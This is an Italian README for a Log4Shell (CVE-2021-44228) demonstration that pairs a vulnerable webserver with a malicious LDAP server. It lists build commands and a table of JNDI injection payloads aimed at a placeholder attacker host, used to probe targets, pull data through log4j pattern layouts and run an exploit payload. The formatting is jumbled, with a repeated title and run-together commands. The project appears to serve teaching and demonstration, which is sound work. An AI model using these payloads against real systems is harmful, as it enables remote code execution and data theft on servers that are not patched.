
Una demo della vulnerabilità Log4Shell (CVE-2021-44228).
Una demo della vulnerabilità Log4Shell (CVE-2021-44228).
Il webserver vulnerabile e il server LDAP malevolo sono stati entrambi compilati e testati su JDK 1.8.0_181.
goodguys, esegui gradlew bootJarjava -jar build/libs/goodguys-0.0.1-SNAPSHOT.jarbadguys, esegui mvn packagejava -jar .\target\evil-server.jarNota: Windows Defender potrebbe spostare silenziosamente
target\classes\Exploit.classin quarantena.
I comandi malevoli sono definiti all'interno di Exploit.java.
| Input | Osservazioni |
|---|---|
${jndi:ldap://evil-server-hostname:389/Recon} | Verifica se il target è vulnerabile ascoltando una richiesta di connessione al server LDAP. |
${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)] | Aggiungi qualsiasi layout di pattern log4j valido per raccogliere i dati dal target e visualizzarli nel terminale dell'attaccante. |
https://securityboulevard.com/2019/01/exploiting-jndi-injections-in-java/
https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/PatternLayout.html
https://www.ibm.com/blog/how-to-detect-patch-log4j-vulnerability/
${jndi:ldap://evil-server-hostname:389/Exploit} | Esegui il payload. |